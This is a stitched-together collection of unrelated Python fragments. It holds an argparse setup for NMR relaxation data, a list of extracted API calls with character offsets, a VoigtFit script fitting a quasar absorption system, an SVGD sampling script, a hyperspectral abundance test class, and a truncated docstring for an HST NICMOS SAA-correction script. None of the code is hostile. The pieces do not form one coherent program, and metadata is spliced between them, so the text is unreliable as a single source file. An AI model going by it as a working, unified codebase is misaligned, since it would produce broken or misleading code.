# Prepare relax subparser
relax_subparser = subparsers.add_parser(name="relax",
help="Process experimental R1 or R2 relaxation data")
relax_subparser.set_defaults(function=process_relax)
input_group = relax_subparser.add_argument_group("input")
action_group = relax_subparser.add_argument_group("action")
output_group = relax_subparser.add_argument_group("output")
relax_type = input_group.add_mutually_exclusive_group()
relax_type.add_argument("--r1", action="store_const", const="r1",
default="r1", dest="relax_type", help="process R1 relaxation data")
relax_type.add_argument("--r2", action="store_const", const="r2",
default="r1", dest="relax_type", help="process R2 relaxation data")
relax_type.add_argument("--pre-dia", action="store_const", const="dia",
default="r1", dest="relax_type",
help="process PRE diamagnetic relaxation data")
relax_type.add_argument("--pre-para", action="store_const", const="para",
default="r1", dest="relax_type",
help="process PRE paramagnetic relaxation data")
input_group.add_argument("-peaklist", required=True, type=str,
help="peak list (exported from ccpnmr)")
input_group.add_argument("-infile", required=True, dest="infiles",
metavar="INFILE", nargs="+", type=str,
help="NMR spectra (NMRPipe format)")
input_group.add_argument("-delay", required=True, dest="delays",
metavar="DELAY", nargs="+", type=str,
help="delays (ms); number of delays must match number of infiles")
action_group.add_argument("-synthetics", required=False,
dest="n_synth_datasets", default=100, type=int,
help="number of synthetic datasets to use to calculate error")
error_method = action_group.add_mutually_exclusive_group()
error_method.add_argument("--rmse", action="store_const", const="rmse",
default="rmse", dest="error_method",
help="use root mean square error to generate synthetic datasets")
error_method.add_argument("--mae", action="store_const", const="mae",
default="rmse", dest="error_method",
help="use mean absolute error to generate synthetic datasets")
output_group.add_argument("-outfile", required=True, type=str,
help="text file to which processed data will be output")
# Prepare hetnoe subparser
hetnoe_subparser = subparsers.add_parser(name="hetnoe",
help="Process experimental heteronuclear NOE relaxation data")
hetnoe_subparser.set_defaults(function=process_hetnoe)
input_group = hetnoe_subparser.add_argument_group("input")
action_group = hetnoe_subparser.add_argument_group("action")
output_group = hetnoe_subparser.add_argument_group("output")
input_group.add_argument("-peaklist", required=True, type=str,
help="peak list (exported from ccpnmr)")
input_group.add_argument("-infile", required=True, dest="infiles",
metavar="INFILE", nargs=2, type=str, help="NMR spectra (NMRPipe format)")
output_group.add_argument("-outfile", required=True, type=str,
help="text file to which processed data will be output")
# Prepare pre subparser
pre_subparser = subparsers.add_parser(name="pre",
help="Process experimental heteronuclear NOE relaxation data")
pre_subparser.set_defaults(function=process_pre)
input_group = pre_subparser.add_argument_group("input")
action_group = pre_subparser.add_argument_group("action")
output_group = pre_subparser.add_argument_group("output")
input_group.add_argument("-dia", required=True, dest="dia_infile",
metavar="DIA_INFILE", type=str, help="Diamagnetic relaxation rates")
input_group.add_argument("-para", required=True, dest="para_infile",
metavar="PARA_INFILE", type=str, help="Paramagnetic relaxation rates")
output_group.add_argument("-outfile", required=True, type=str,
help="text file to which processed data will be output")
# Verbosity
for p in subparsers.choices.values():
verbosity = p.add_mutually_exclusive_group()
verbosity.add_argument("-v", "--verbose", action="count", default=1,
help="enable verbose output, may be specified more than once")
verbosity.add_argument("-q", "--quiet", action="store_const", const=0,
default=1, dest="verbose", help="disable verbose output")
# Parse arguments and run selected function
kwargs = vars(parser.parse_args())
kwargs.pop("function")(**kwargs)
|
[
"numpy.abs",
"argparse.ArgumentParser",
"pandas.read_csv",
"numpy.argmin",
"numpy.isnan",
"numpy.exp",
"multiprocessing.Queue",
"numpy.random.normal",
"pandas.DataFrame",
"numpy.std",
"numpy.loadtxt",
"pandas.concat",
"re.match",
"scipy.optimize.curve_fit",
"os.path.expandvars",
"pandas.Series",
"re.compile",
"nmrglue.pipe.read",
"numpy.zeros",
"pandas.DataFrame.from_items",
"numpy.array",
"numpy.column_stack",
"nmrglue.pipe.make_uc",
"numpy.sqrt"
] |
[((1673, 1681), 'multiprocessing.Queue', 'Queue', (['(1)'], {}), '(1)\n', (1678, 1681), False, 'from multiprocessing import Queue, Process\n'), ((1698, 1705), 'multiprocessing.Queue', 'Queue', ([], {}), '()\n', (1703, 1705), False, 'from multiprocessing import Queue, Process\n'), ((5319, 5349), 'pandas.DataFrame.from_items', 'pd.DataFrame.from_items', (['items'], {}), '(items)\n', (5342, 5349), True, 'import pandas as pd\n'), ((8562, 8618), 'pandas.DataFrame', 'pd.DataFrame', (['(0.0)'], {'index': 'final_index', 'columns': 'final_cols'}), '(0.0, index=final_index, columns=final_cols)\n', (8574, 8618), True, 'import pandas as pd\n'), ((8632, 8686), 'pandas.DataFrame', 'pd.DataFrame', (['(0)'], {'index': 'final_index', 'columns': 'final_cols'}), '(0, index=final_index, columns=final_cols)\n', (8644, 8686), True, 'import pandas as pd\n'), ((10392, 10412), 'os.path.expandvars', 'expandvars', (['peaklist'], {}), '(peaklist)\n', (10402, 10412), False, 'from os.path import expandvars\n'), ((10427, 10446), 'os.path.expandvars', 'expandvars', (['outfile'], {}), '(outfile)\n', (10437, 10446), False, 'from os.path import expandvars\n'), ((10658, 10802), 'pandas.read_csv', 'pd.read_csv', (['peaklist'], {'sep': '"""\t"""', 'usecols': '[2, 3, 4]', 'index_col': '(2)', 'converters': '{(4): convert_name}', 'names': "['1H', '15N', 'residue']", 'skiprows': '(1)'}), "(peaklist, sep='\\t', usecols=[2, 3, 4], index_col=2, converters=\n {(4): convert_name}, names=['1H', '15N', 'residue'], skiprows=1)\n", (10669, 10802), True, 'import pandas as pd\n'), ((14293, 14313), 'os.path.expandvars', 'expandvars', (['peaklist'], {}), '(peaklist)\n', (14303, 14313), False, 'from os.path import expandvars\n'), ((14328, 14347), 'os.path.expandvars', 'expandvars', (['outfile'], {}), '(outfile)\n', (14338, 14347), False, 'from os.path import expandvars\n'), ((14559, 14703), 'pandas.read_csv', 'pd.read_csv', (['peaklist'], {'sep': '"""\t"""', 'usecols': '[2, 3, 4]', 'index_col': '(2)', 'converters': '{(4): convert_name}', 'names': "['1H', '15N', 'residue']", 'skiprows': '(1)'}), "(peaklist, sep='\\t', usecols=[2, 3, 4], index_col=2, converters=\n {(4): convert_name}, names=['1H', '15N', 'residue'], skiprows=1)\n", (14570, 14703), True, 'import pandas as pd\n'), ((15062, 15091), 'nmrglue.pipe.read', 'nmrglue.pipe.read', (['infiles[0]'], {}), '(infiles[0])\n', (15079, 15091), False, 'import nmrglue\n'), ((15638, 15667), 'nmrglue.pipe.read', 'nmrglue.pipe.read', (['infiles[1]'], {}), '(infiles[1])\n', (15655, 15667), False, 'import nmrglue\n'), ((17036, 17093), 'pandas.read_csv', 'pd.read_csv', (['dia_infile'], {'index_col': '(0)', 'delimiter': '"""\\\\s\\\\s+"""'}), "(dia_infile, index_col=0, delimiter='\\\\s\\\\s+')\n", (17047, 17093), True, 'import pandas as pd\n'), ((17406, 17464), 'pandas.read_csv', 'pd.read_csv', (['para_infile'], {'index_col': '(0)', 'delimiter': '"""\\\\s\\\\s+"""'}), "(para_infile, index_col=0, delimiter='\\\\s\\\\s+')\n", (17417, 17464), True, 'import pandas as pd\n'), ((17752, 17846), 'pandas.concat', 'pd.concat', (["(relax, para_relax[['para I0', 'para I0 se', 'para r2', 'para r2 se']])"], {'axis': '(1)'}), "((relax, para_relax[['para I0', 'para I0 se', 'para r2',\n 'para r2 se']]), axis=1)\n", (17761, 17846), True, 'import pandas as pd\n'), ((17958, 18085), 'numpy.sqrt', 'np.sqrt', (["(relax['I/I0'] ** 2 * ((relax['para I0 se'] / relax['para I0']) ** 2 + (\n relax['dia I0 se'] / relax['dia I0']) ** 2))"], {}), "(relax['I/I0'] ** 2 * ((relax['para I0 se'] / relax['para I0']) ** 2 +\n (relax['dia I0 se'] 
/ relax['dia I0']) ** 2))\n", (17965, 18085), True, 'import numpy as np\n'), ((18181, 18310), 'numpy.sqrt', 'np.sqrt', (["(relax['r20/r2'] ** 2 * ((relax['dia r2 se'] / relax['dia r2']) ** 2 + (\n relax['para r2 se'] / relax['para r2']) ** 2))"], {}), "(relax['r20/r2'] ** 2 * ((relax['dia r2 se'] / relax['dia r2']) ** 2 +\n (relax['para r2 se'] / relax['para r2']) ** 2))\n", (18188, 18310), True, 'import numpy as np\n'), ((18402, 18461), 'numpy.sqrt', 'np.sqrt', (["(relax['para r2 se'] ** 2 + relax['dia r2 se'] ** 2)"], {}), "(relax['para r2 se'] ** 2 + relax['dia r2 se'] ** 2)\n", (18409, 18461), True, 'import numpy as np\n'), ((20067, 20163), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '__doc__', 'formatter_class': 'argparse.RawTextHelpFormatter'}), '(description=__doc__, formatter_class=argparse.\n RawTextHelpFormatter)\n', (20090, 20163), False, 'import argparse\n'), ((2899, 2977), 're.compile', 're.compile', (['"""^#Vec\\\\s+[\\\\w_]+\\\\[T1\\\\]\\\\s+[\\\\w_]+\\\\[T2\\\\]\\\\s+[\\\\w_]+\\\\[NOE\\\\]$"""'], {}), "('^#Vec\\\\s+[\\\\w_]+\\\\[T1\\\\]\\\\s+[\\\\w_]+\\\\[T2\\\\]\\\\s+[\\\\w_]+\\\\[NOE\\\\]$')\n", (2909, 2977), False, 'import re\n'), ((2993, 3032), 're.compile', 're.compile', (['"""^#Vec\\\\s+[\\\\w_]+\\\\[S2\\\\]$"""'], {}), "('^#Vec\\\\s+[\\\\w_]+\\\\[S2\\\\]$')\n", (3003, 3032), False, 'import re\n'), ((3040, 3068), 're.match', 're.match', (['re_t1t2noe', 'fields'], {}), '(re_t1t2noe, fields)\n', (3048, 3068), False, 'import re\n'), ((5676, 5725), 'numpy.column_stack', 'np.column_stack', (['(data.index.values, data.values)'], {}), '((data.index.values, data.values))\n', (5691, 5725), True, 'import numpy as np\n'), ((6583, 6642), 'pandas.read_csv', 'pd.read_csv', (['sim_infile'], {'delim_whitespace': '(True)', 'index_col': '(0)'}), '(sim_infile, delim_whitespace=True, index_col=0)\n', (6594, 6642), True, 'import pandas as pd\n'), ((6657, 6716), 'pandas.read_csv', 'pd.read_csv', (['exp_infile'], {'delim_whitespace': '(True)', 'index_col': '(0)'}), '(exp_infile, delim_whitespace=True, index_col=0)\n', (6668, 6716), True, 'import pandas as pd\n'), ((9745, 9796), 'numpy.column_stack', 'np.column_stack', (['(final.index.values, final.values)'], {}), '((final.index.values, final.values))\n', (9760, 9796), True, 'import numpy as np\n'), ((11015, 11040), 'nmrglue.pipe.read', 'nmrglue.pipe.read', (['infile'], {}), '(infile)\n', (11032, 11040), False, 'import nmrglue\n'), ((11566, 11594), 'numpy.array', 'np.array', (['delays', 'np.float64'], {}), '(delays, np.float64)\n', (11574, 11594), True, 'import numpy as np\n'), ((12330, 12366), 'numpy.zeros', 'np.zeros', (['(n_synth_datasets, I.size)'], {}), '((n_synth_datasets, I.size))\n', (12338, 12366), True, 'import numpy as np\n'), ((13107, 13123), 'numpy.std', 'np.std', (['synth_Rs'], {}), '(synth_Rs)\n', (13113, 13123), True, 'import numpy as np\n'), ((13140, 13164), 'pandas.Series', 'pd.Series', (['[I0, R, R_se]'], {}), '([I0, R, R_se])\n', (13149, 13164), True, 'import pandas as pd\n'), ((13750, 13801), 'numpy.column_stack', 'np.column_stack', (['(relax.index.values, relax.values)'], {}), '((relax.index.values, relax.values))\n', (13765, 13801), True, 'import numpy as np\n'), ((14803, 14842), 'numpy.argmin', 'np.argmin', (["((hydrogen - peak['1H']) ** 2)"], {}), "((hydrogen - peak['1H']) ** 2)\n", (14812, 14842), True, 'import numpy as np\n'), ((14861, 14901), 'numpy.argmin', 'np.argmin', (["((nitrogen - peak['15N']) ** 2)"], {}), "((nitrogen - peak['15N']) ** 2)\n", (14870, 14901), True, 'import 
numpy as np\n'), ((15972, 16044), 'numpy.sqrt', 'np.sqrt', (["((sat_se / relax['sat']) ** 2 + (nosat_se / relax['nosat']) ** 2)"], {}), "((sat_se / relax['sat']) ** 2 + (nosat_se / relax['nosat']) ** 2)\n", (15979, 16044), True, 'import numpy as np\n'), ((16472, 16523), 'numpy.column_stack', 'np.column_stack', (['(relax.index.values, relax.values)'], {}), '((relax.index.values, relax.values))\n', (16487, 16523), True, 'import numpy as np\n'), ((3093, 3129), 'numpy.loadtxt', 'np.loadtxt', (['infile'], {'dtype': 'np.float32'}), '(infile, dtype=np.float32)\n', (3103, 3129), True, 'import numpy as np\n'), ((3314, 3348), 'pandas.read_csv', 'pd.read_csv', (['infile'], {}), '(infile, **read_csv_kw)\n', (3325, 3348), True, 'import pandas as pd\n'), ((3504, 3527), 're.match', 're.match', (['re_s2', 'fields'], {}), '(re_s2, fields)\n', (3512, 3527), False, 'import re\n'), ((7644, 7681), 'numpy.abs', 'np.abs', (['(exp[err_cols] - sim[err_cols])'], {}), '(exp[err_cols] - sim[err_cols])\n', (7650, 7681), True, 'import numpy as np\n'), ((7684, 7705), 'numpy.abs', 'np.abs', (['exp[err_cols]'], {}), '(exp[err_cols])\n', (7690, 7705), True, 'import numpy as np\n'), ((10272, 10290), 'os.path.expandvars', 'expandvars', (['infile'], {}), '(infile)\n', (10282, 10290), False, 'from os.path import expandvars\n'), ((11292, 11331), 'numpy.argmin', 'np.argmin', (["((hydrogen - peak['1H']) ** 2)"], {}), "((hydrogen - peak['1H']) ** 2)\n", (11301, 11331), True, 'import numpy as np\n'), ((11354, 11394), 'numpy.argmin', 'np.argmin', (["((nitrogen - peak['15N']) ** 2)"], {}), "((nitrogen - peak['15N']) ** 2)\n", (11363, 11394), True, 'import numpy as np\n'), ((11942, 11994), 'scipy.optimize.curve_fit', 'curve_fit', (['model_function', 'delays', 'I'], {'p0': '(I[0], 1.0)'}), '(model_function, delays, I, p0=(I[0], 1.0))\n', (11951, 11994), False, 'from scipy.optimize import curve_fit\n'), ((12469, 12518), 'numpy.random.normal', 'np.random.normal', (['I_mean', 'error', 'n_synth_datasets'], {}), '(I_mean, error, n_synth_datasets)\n', (12485, 12518), True, 'import numpy as np\n'), ((14183, 14201), 'os.path.expandvars', 'expandvars', (['infile'], {}), '(infile)\n', (14193, 14201), False, 'from os.path import expandvars\n'), ((15107, 15157), 'nmrglue.pipe.make_uc', 'nmrglue.pipe.make_uc', (['parameters', 'intensity'], {'dim': '(1)'}), '(parameters, intensity, dim=1)\n', (15127, 15157), False, 'import nmrglue\n'), ((15185, 15235), 'nmrglue.pipe.make_uc', 'nmrglue.pipe.make_uc', (['parameters', 'intensity'], {'dim': '(0)'}), '(parameters, intensity, dim=0)\n', (15205, 15235), False, 'import nmrglue\n'), ((16825, 16847), 'os.path.expandvars', 'expandvars', (['dia_infile'], {}), '(dia_infile)\n', (16835, 16847), False, 'from os.path import expandvars\n'), ((16875, 16898), 'os.path.expandvars', 'expandvars', (['para_infile'], {}), '(para_infile)\n', (16885, 16898), False, 'from os.path import expandvars\n'), ((18828, 18853), 'numpy.isnan', 'np.isnan', (["relax['dia I0']"], {}), "(relax['dia I0'])\n", (18836, 18853), True, 'import numpy as np\n'), ((18886, 18914), 'numpy.isnan', 'np.isnan', (["relax['dia I0 se']"], {}), "(relax['dia I0 se'])\n", (18894, 18914), True, 'import numpy as np\n'), ((18945, 18971), 'numpy.isnan', 'np.isnan', (["relax['para I0']"], {}), "(relax['para I0'])\n", (18953, 18971), True, 'import numpy as np\n'), ((19005, 19034), 'numpy.isnan', 'np.isnan', (["relax['para I0 se']"], {}), "(relax['para I0 se'])\n", (19013, 19034), True, 'import numpy as np\n'), ((3552, 3588), 'numpy.loadtxt', 'np.loadtxt', 
(['infile'], {'dtype': 'np.float32'}), '(infile, dtype=np.float32)\n', (3562, 3588), True, 'import numpy as np\n'), ((3744, 3778), 'pandas.read_csv', 'pd.read_csv', (['infile'], {}), '(infile, **read_csv_kw)\n', (3755, 3778), True, 'import pandas as pd\n'), ((3912, 3947), 'numpy.loadtxt', 'np.loadtxt', (['indexfile'], {'dtype': 'np.str'}), '(indexfile, dtype=np.str)\n', (3922, 3947), True, 'import numpy as np\n'), ((9326, 9345), 'numpy.sqrt', 'np.sqrt', (['final[col]'], {}), '(final[col])\n', (9333, 9345), True, 'import numpy as np\n'), ((11060, 11110), 'nmrglue.pipe.make_uc', 'nmrglue.pipe.make_uc', (['parameters', 'intensity'], {'dim': '(1)'}), '(parameters, intensity, dim=1)\n', (11080, 11110), False, 'import nmrglue\n'), ((11152, 11202), 'nmrglue.pipe.make_uc', 'nmrglue.pipe.make_uc', (['parameters', 'intensity'], {'dim': '(0)'}), '(parameters, intensity, dim=0)\n', (11172, 11202), False, 'import nmrglue\n'), ((11824, 11855), 'numpy.exp', 'np.exp', (['(-1 * delay * relaxation)'], {}), '(-1 * delay * relaxation)\n', (11830, 11855), True, 'import numpy as np\n'), ((12655, 12717), 'scipy.optimize.curve_fit', 'curve_fit', (['model_function', 'delays', 'synth_intensity'], {'p0': '(I0, R)'}), '(model_function, delays, synth_intensity, p0=(I0, R))\n', (12664, 12717), False, 'from scipy.optimize import curve_fit\n'), ((4201, 4228), 'pandas.concat', 'pd.concat', (['r1r2noe_datasets'], {}), '(r1r2noe_datasets)\n', (4210, 4228), True, 'import pandas as pd\n'), ((4275, 4302), 'pandas.concat', 'pd.concat', (['r1r2noe_datasets'], {}), '(r1r2noe_datasets)\n', (4284, 4302), True, 'import pandas as pd\n'), ((4943, 4965), 'pandas.concat', 'pd.concat', (['s2_datasets'], {}), '(s2_datasets)\n', (4952, 4965), True, 'import pandas as pd\n'), ((5007, 5029), 'pandas.concat', 'pd.concat', (['s2_datasets'], {}), '(s2_datasets)\n', (5016, 5029), True, 'import pandas as pd\n'), ((7968, 8036), 'numpy.sqrt', 'np.sqrt', (['(exp[err_se_cols].values ** 2 + sim[err_se_cols].values ** 2)'], {}), '(exp[err_se_cols].values ** 2 + sim[err_se_cols].values ** 2)\n', (7975, 8036), True, 'import numpy as np\n')]
|
import numpy as np
import matplotlib.pyplot as plt
import VoigtFit
import pickle
### Fit DLA towards quasar Q1313+1441
### Observed in X-shooter P089.A-0068
z_DLA = 1.7941
logNHI = 21.3, 0.1 # value, uncertainty
# If log(NHI) is not known use:
#logNHI = None
#### Load UVB and VIS data:
UVB_fname = 'data/test_UVB_1d.spec'
res_UVB = 8000
VIS_fname = 'data/test_VIS_1d.spec'
res_VIS = 11800
wl_uvb, spec_uvb, err_uvb = np.loadtxt(UVB_fname, unpack=True)
wl_vis, spec_vis, err_vis = np.loadtxt(VIS_fname, unpack=True)
dataset = VoigtFit.DataSet(z_DLA)
dataset.add_data(wl_uvb, spec_uvb, 299792./res_UVB, err=err_uvb, normalized=False)
dataset.add_data(wl_vis, spec_vis, 299792./res_VIS, err=err_vis, normalized=False)
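# 299792 km/s is the speed of light, so 299792./res converts the resolving
# power (8000 for UVB, 11800 for VIS) into a velocity width in km/s,
# presumably the spectral resolution that add_data expects.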
### Define absorption lines:
dataset.add_line('FeII_2374')
dataset.add_line('FeII_2260')
dataset.add_line('CrII_2056')
dataset.add_line('CrII_2066')
dataset.add_line('CrII_2026')
dataset.add_line('ZnII_2026')
dataset.add_line('MgI_2026')
dataset.add_line('MgI_2852')
### This command prepares the line regions:
# First the data are interactively normalized
# Then regions which should not be fitted are masked interactively too
dataset.prepare_dataset()
# Save the dataset so you don't have to normalize and mask every time:
VoigtFit.SaveDataSet('test.dataset', dataset)
### The dataset which was defined above can be loaded like this:
# In this case, comment out lines 18-41
#dataset = VoigtFit.LoadDataSet('test.dataset')
### If a line has been defined, and you don't want to fit it
### it can either be removed from the dataset completely:
#dataset.remove_line('CrII_2056')
### or deactivated:
#dataset.deactivate_line('FeII_2374')
dataset.reset_components()
### Add velocity components for each ion:
# ion z b logN
dataset.add_component('FeII', 1.793532, 20, 14.3, var_z=1)
dataset.add_component('FeII', 1.794060, 20, 15.0, var_z=1)
dataset.add_component('FeII', 1.794282, 20, 14.3, var_z=1)
dataset.add_component('FeII', 1.794722, 20, 14.3, var_z=1)
dataset.add_component('FeII', 1.795121, 15, 14.5, var_z=1, var_b=1)
#
# Options for the components:
# var_z=1/0 vary redshift for this component
# var_b=1/0 vary b-parameter for this component
# var_N=1/0 vary column density for this component
#
# Redshift and b-parameters can be tied.
# passing the option 'tie_z=z0_FeII' ties the redshift to the first component of FeII
# passing the option 'tie_b=b2_SiII' ties the b-parameter to the third component of SiII
#
# NOTE - the ion must be defined and the component index starts with 0
#
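# For example (illustrative only, not used in this fit), a SiII component tied
# to the redshift of the first FeII component, with its b-parameter held fixed,
# could be added as:
#   dataset.add_component('SiII', 1.794060, 20, 14.8, tie_z='z0_FeII', var_b=0)
#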
# The entire velocity structure can be copied from one ion to another:
dataset.copy_components('ZnII', 'FeII', logN=12.9, ref_comp=1)
# This copies the five components defined for FeII to ZnII and keeps
# the same pattern of initial guesses for column density.
# By giving ref_comp and logN, this initial guess pattern is scaled such
# that the second component has logN=12.9
#
# Individual components which are not observed for weaker lines can be removed:
#dataset.delete_component('ZnII', 4) # the index '4' refers to the fifth component
#dataset.delete_component('ZnII', 3)
#dataset.delete_component('ZnII', 2)
#dataset.delete_component('ZnII', 1)
#dataset.delete_component('ZnII', 0)
# NOTE - components should be deleted from last component to first component
# not the other way around as that messes up the component numbering.
dataset.copy_components('CrII', 'FeII', logN=13.6, ref_comp=1)
dataset.copy_components('MgI', 'FeII', logN=12.4, ref_comp=1)
dataset.prepare_dataset()
popt, chi2 = dataset.fit(verbose=True)
dataset.plot_fit()
if logNHI:
dataset.print_metallicity(*logNHI)
dataset.print_abundance()
#### Remove parameter links
#### The links may result in error when loading the parameters later.
for par in popt.params.values():
par.expr = None
for par in dataset.pars.values():
par.expr = None
pickle.dump(popt.params, open('example_best_fit.pars', 'wb'))
VoigtFit.SaveDataSet('example_fit.dataset', dataset)
|
[
"VoigtFit.DataSet",
"numpy.loadtxt",
"VoigtFit.SaveDataSet"
] |
[((424, 458), 'numpy.loadtxt', 'np.loadtxt', (['UVB_fname'], {'unpack': '(True)'}), '(UVB_fname, unpack=True)\n', (434, 458), True, 'import numpy as np\n'), ((487, 521), 'numpy.loadtxt', 'np.loadtxt', (['VIS_fname'], {'unpack': '(True)'}), '(VIS_fname, unpack=True)\n', (497, 521), True, 'import numpy as np\n'), ((533, 556), 'VoigtFit.DataSet', 'VoigtFit.DataSet', (['z_DLA'], {}), '(z_DLA)\n', (549, 556), False, 'import VoigtFit\n'), ((1251, 1296), 'VoigtFit.SaveDataSet', 'VoigtFit.SaveDataSet', (['"""test.dataset"""', 'dataset'], {}), "('test.dataset', dataset)\n", (1271, 1296), False, 'import VoigtFit\n'), ((3951, 4003), 'VoigtFit.SaveDataSet', 'VoigtFit.SaveDataSet', (['"""example_fit.dataset"""', 'dataset'], {}), "('example_fit.dataset', dataset)\n", (3971, 4003), False, 'import VoigtFit\n')]
|
from time import time
import os
import numpy as np
from scipy.stats import multivariate_normal
from experiments.lnpdfs.create_target_lnpfs import build_Goodwin_grad
from sampler.SVGD.python.svgd import SVGD as SVGD
unknown_params = [1, 2] + np.arange(4, 12).tolist()
num_dimensions = len(unknown_params)
seed=1
target_lnpdf = build_Goodwin_grad(unknown_params, seed=seed, sigma=np.sqrt(0.2),
parameters=np.array([10., 1.97, 0.46, 0.53,
0.02878028, 0.13585575, 1.57070286, 0.75737477,
0.28929913, 1.52671658, 1.26995194, 1.89562767]))
def dlnpdf(theta):
input = np.atleast_2d(theta)
dlnpdf.counter += len(input)
return target_lnpdf(input)[1]
dlnpdf.counter = 0
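# dlnpdf.counter accumulates the number of gradient evaluations; it is saved
# below as 'nfevals' alongside the samples and the wall-clock time.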
def sample(n_samps, n_iter, epsilon, path):
if path is not None:
dirname = os.path.dirname(path)
if not os.path.exists(dirname):
os.makedirs(dirname)
prior = multivariate_normal(np.zeros((num_dimensions)), np.eye(num_dimensions))
x0 = prior.rvs(n_samps)
start = time()
samples = SVGD().update(x0, dlnpdf, n_iter=n_iter, stepsize=epsilon, path=path)
end = time()
np.savez(path, samples=samples, wallclocktime=end-start, nfevals=dlnpdf.counter)
print("done")
if __name__ == '__main__':
sample(100, 100, 1e-2, "/tmp/svgd_frisk_test")
|
[
"numpy.atleast_2d",
"os.makedirs",
"os.path.dirname",
"numpy.zeros",
"os.path.exists",
"time.time",
"numpy.array",
"numpy.arange",
"numpy.eye",
"numpy.savez",
"sampler.SVGD.python.svgd.SVGD",
"numpy.sqrt"
] |
[((711, 731), 'numpy.atleast_2d', 'np.atleast_2d', (['theta'], {}), '(theta)\n', (724, 731), True, 'import numpy as np\n'), ((1126, 1132), 'time.time', 'time', ([], {}), '()\n', (1130, 1132), False, 'from time import time\n'), ((1227, 1233), 'time.time', 'time', ([], {}), '()\n', (1231, 1233), False, 'from time import time\n'), ((1238, 1325), 'numpy.savez', 'np.savez', (['path'], {'samples': 'samples', 'wallclocktime': '(end - start)', 'nfevals': 'dlnpdf.counter'}), '(path, samples=samples, wallclocktime=end - start, nfevals=dlnpdf.\n counter)\n', (1246, 1325), True, 'import numpy as np\n'), ((379, 391), 'numpy.sqrt', 'np.sqrt', (['(0.2)'], {}), '(0.2)\n', (386, 391), True, 'import numpy as np\n'), ((438, 573), 'numpy.array', 'np.array', (['[10.0, 1.97, 0.46, 0.53, 0.02878028, 0.13585575, 1.57070286, 0.75737477, \n 0.28929913, 1.52671658, 1.26995194, 1.89562767]'], {}), '([10.0, 1.97, 0.46, 0.53, 0.02878028, 0.13585575, 1.57070286, \n 0.75737477, 0.28929913, 1.52671658, 1.26995194, 1.89562767])\n', (446, 573), True, 'import numpy as np\n'), ((907, 928), 'os.path.dirname', 'os.path.dirname', (['path'], {}), '(path)\n', (922, 928), False, 'import os\n'), ((1034, 1058), 'numpy.zeros', 'np.zeros', (['num_dimensions'], {}), '(num_dimensions)\n', (1042, 1058), True, 'import numpy as np\n'), ((1062, 1084), 'numpy.eye', 'np.eye', (['num_dimensions'], {}), '(num_dimensions)\n', (1068, 1084), True, 'import numpy as np\n'), ((242, 258), 'numpy.arange', 'np.arange', (['(4)', '(12)'], {}), '(4, 12)\n', (251, 258), True, 'import numpy as np\n'), ((944, 967), 'os.path.exists', 'os.path.exists', (['dirname'], {}), '(dirname)\n', (958, 967), False, 'import os\n'), ((981, 1001), 'os.makedirs', 'os.makedirs', (['dirname'], {}), '(dirname)\n', (992, 1001), False, 'import os\n'), ((1147, 1153), 'sampler.SVGD.python.svgd.SVGD', 'SVGD', ([], {}), '()\n', (1151, 1153), True, 'from sampler.SVGD.python.svgd import SVGD as SVGD\n')]
|
import numpy as np
import hypers as hp
class TestLearning:
def setup(self):
self.n3 = np.random.rand(10, 10, 30)
self.n4 = np.random.rand(10, 10, 10, 30)
self.n5 = np.random.rand(10, 10, 10, 2, 30)
self.h3 = hp.hparray(self.n3)
self.h4 = hp.hparray(self.n4)
self.h5 = hp.hparray(self.n5)
self.arrays = (self.h3, self.h4, self.h5)
def test_abundance(self):
for array in self.arrays:
ucls = array.abundance.ucls
nnls = array.abundance.nnls
fcls = array.abundance.fcls
for amethod in (ucls, nnls, fcls):
spec1d = np.random.rand(array.shape[-1])
_ = amethod.calculate(spec1d)
assert amethod.map.shape == array.shape[:-1] + (1,)
spec2d = np.random.rand(array.shape[-1], 3)
_ = amethod.calculate(spec2d)
assert amethod.map.shape == array.shape[:-1] + (3,)
|
[
"numpy.random.rand",
"hypers.hparray"
] |
[((100, 126), 'numpy.random.rand', 'np.random.rand', (['(10)', '(10)', '(30)'], {}), '(10, 10, 30)\n', (114, 126), True, 'import numpy as np\n'), ((145, 175), 'numpy.random.rand', 'np.random.rand', (['(10)', '(10)', '(10)', '(30)'], {}), '(10, 10, 10, 30)\n', (159, 175), True, 'import numpy as np\n'), ((194, 227), 'numpy.random.rand', 'np.random.rand', (['(10)', '(10)', '(10)', '(2)', '(30)'], {}), '(10, 10, 10, 2, 30)\n', (208, 227), True, 'import numpy as np\n'), ((247, 266), 'hypers.hparray', 'hp.hparray', (['self.n3'], {}), '(self.n3)\n', (257, 266), True, 'import hypers as hp\n'), ((285, 304), 'hypers.hparray', 'hp.hparray', (['self.n4'], {}), '(self.n4)\n', (295, 304), True, 'import hypers as hp\n'), ((323, 342), 'hypers.hparray', 'hp.hparray', (['self.n5'], {}), '(self.n5)\n', (333, 342), True, 'import hypers as hp\n'), ((652, 683), 'numpy.random.rand', 'np.random.rand', (['array.shape[-1]'], {}), '(array.shape[-1])\n', (666, 683), True, 'import numpy as np\n'), ((824, 858), 'numpy.random.rand', 'np.random.rand', (['array.shape[-1]', '(3)'], {}), '(array.shape[-1], 3)\n', (838, 858), True, 'import numpy as np\n')]
|
#! /usr/bin/env python
"""
runcalsaa.py - Module to perform SAA correction in the CALNIC pipeline
(After CALNICA, before CALNICB) by running the PEDSUB, BEP, and SAACLEAN tasks.
PEDSUB is run only to improve the calculations of the SAA persistence and BEP
signature; no pedestal correction is actually applied to the final output
image.
USAGE: runcalsaa.py [-d] ipppssoot_raw.fits
Alternative USAGE: python
import runcalsaa
status=runcalsaa.run('ipppssoot_raw.fits')
RETURN VALUES:
It will return status codes to indicate completion status:
0 = successful completion with correction applied
4 = successful completion with no correction applied
1 = failed gracefully with exception
3 = aborted gracefully based on self-diagnostic
REQUIRED INPUT FILES:
Although these files are not specified on the command line, they
must be available for the script to succeed.
In the working directory:
ipppssoot_cal.fits
The association file specified in SAA_DARK
The _raw files specified in that association file
As specified in the _cal file header:
SAACNTAB
PEDSBTAB
FLATFILE
As specified in the post-SAA exposure file headers:
MASKFILE
SAADFILE
OUTPUT FILES & EFFECTS:
The ipppssoot_cal.fits file may be replaced.
The SAADONE keyword in the ipppssoot_cal.fits file is updated.
The BEPDONE keyword in the ipppssoot_cal.fits file is updated.
The ipppssoot_trl.txt file is appended to.
INTERIM FILES:
A _psb.fits file is created temporarily, but removed by the script.
A _ped2.fits file is created temporarily, but removed by the script.
@author: <NAME>, <NAME>
@version: 0.4 (3-Jul-2006)
0.5 (13-Aug-2008)
1.0 (26-Jan-2009)
1.1 (29-Jan-2009)
